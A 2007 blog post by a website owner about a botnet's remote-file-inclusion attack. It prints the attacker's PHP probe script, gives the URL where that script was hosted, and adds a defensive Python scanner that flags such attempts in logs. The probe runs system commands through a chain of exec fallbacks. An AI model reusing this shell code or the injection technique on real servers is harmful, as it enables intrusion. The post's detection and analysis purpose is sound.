Sunday, October 28, 2007

Hackers Try Another Botnet Attack

Here we go again: the hackers are making another run at one of my websites, trying to inject PHP code into a site that doesn't even have PHP enabled, which is amusing at best.

The script they were trying to inject was located here:

http://www.doncapone.com.br/.,/n?
Here's a copy of their PHP script for your viewing pleasure:
<?php
// Marker string echoed first so the caller can recognise a successful include.
$ker = @php_uname();
$osx = @PHP_OS;
echo "f7f32504cabcb48c21030c024c6e5c1a<br>"; // md5('xeQt')
echo "Uname:$ker<br>";
echo "SySOs:$osx<br>";
// Pick a recon command that matches the host OS.
if ($osx == "WINNT") { $xeQt = "ipconfig -a"; }
else { $xeQt = "id"; }
$hitemup = ex($xeQt);
echo $hitemup;

// Run a command through whichever execution function the host left enabled,
// falling back through exec, shell_exec, system, passthru and popen.
function ex($cfe)
{
    $res = '';
    if (!empty($cfe))
    {
        if (function_exists('exec'))
        {
            @exec($cfe, $res);
            $res = join("\n", $res);
        }
        elseif (function_exists('shell_exec'))
        {
            $res = @shell_exec($cfe);
        }
        elseif (function_exists('system'))
        {
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif (function_exists('passthru'))
        {
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif (@is_resource($f = @popen($cfe, "r")))
        {
            $res = "";
            while (!@feof($f)) { $res .= @fread($f, 1024); }
            @pclose($f);
        }
    }
    return $res;
}
?>
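As an added example that is not part of this post, here is a small Python scanner for web server access logs that flags remote-file-inclusion attempts like this one: any query parameter whose value is a remote URL, which is how a probe such as the script above gets pulled into a PHP include. The log lines are constructed; the injected URL is the one from this post, and the parameter name `page` is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format fields we need: client IP, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Schemes PHP's stream wrappers will fetch when allow_url_include/allow_url_fopen are on.
REMOTE_SCHEMES = tuple(s + "://" for s in ("http", "https", "ftp", "ftps"))

# Constructed sample lines (not real traffic). The first two carry the probe URL
# from this post, plain and percent-encoded; the third is a normal request.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Oct/2007:03:12:44 -0700] "GET /index.php?page=http://www.doncapone.com.br/.,/n? HTTP/1.1" 403 0',
    '198.51.100.9 - - [28/Oct/2007:03:12:51 -0700] "GET /index.php?page=http%3A%2F%2Fwww.doncapone.com.br%2F.%2C%2Fn%3F HTTP/1.1" 403 0',
    '192.0.2.5 - - [28/Oct/2007:03:13:02 -0700] "GET /index.php?page=about HTTP/1.1" 200 1432',
]


def find_rfi_params(target):
    """Return [(param, value)] for query values that point at a remote resource.
    The value is decoded a second time because probes are often double-encoded."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value).strip()
        if decoded.lower().startswith(REMOTE_SCHEMES):
            hits.append((name, decoded))
    return hits


def scan_log(lines):
    """One finding per request carrying a remote URL in a parameter.
    trailing_qmark notes the '?' the attacker appends so that whatever the
    vulnerable include adds (e.g. '.php') becomes a harmless query string."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, url in find_rfi_params(m.group("target")):
            findings.append({"ip": m.group("ip"), "param": name, "url": url,
                             "trailing_qmark": url.endswith("?")})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} RFI via {f['param']}={f['url']}")
```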
Here's a list of IPs, with reverse DNS, of the botnet machines involved in the attack, so you can see that any machine can be infected; it's pretty random.

Pretty random list of sites infected with this botnet from locations throughout the world.

The bot blocker shut down all of these attempts, but I wonder what they'll try next time.

4 comments:

Jeremy said...

What did the script do?

What kind of site was it?

IncrediBILL said...

The site was hacked; they weren't involved.

The script is a type of shell script, the entryway into the server; it's a probe.

Ban Proxies said...

I ran this search else { $xeQt="id"; }.

I'm very curious what OS those hacked boxes are running.

Ban Proxies said...

Google Wireless Transcoder being used in a hacking attempt.

Log File
- Request contained a malicious JavaScript or SQL injection attack

Header
- GET /node/4124#comment-501 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Encoding: gzip Accept-Language: en-us Cookie: PHPSESSID=554c98325f86ae95927204be27b834bc; bb2_screener_=1195063773+72.14.193.1+86.106.50.55 Host: www.xxx.com Referer: http://www.xxx.com/node/4124 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3; IEMB3) X-Forwarded-For: 86.106.50.55 X-moz: prefetch

IP Whois = 72.14.193.1 - - [20/May/2007:12:38:06 +0200] "GET /images/cs.gif HTTP/1.1" 200 546 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Google Wireless Transcoder;)"

This is the hacker:
inetnum: 86.106.32.0 - 86.106.63.255
netname: SC-UPC-ROMANIA-SA
descr: SC UPC Romania SA
descr: str. Herastrau 17
descr: Bucuresti 1
country: ro
admin-c: AH1598-RIPE
tech-c: MA190-RIPE
status: ASSIGNED PA
remarks: Registered trough http://www.jump.ro/ip.html
mnt-by: RO-MNT
mnt-lower: RO-MNT
mnt-routes: ASTRALTELECOM-MNT
source: RIPE Filtered
person: Astral Telecom Hostmaster
address: Astral Telecom SA
address: ROMANIA
phone: 40 264 414688
fax-no: 40 264 414687
e-mail: hostmaster@astral.ro
I blocked 86.106.32.0/19 about 6 months ago and the garbage still got through.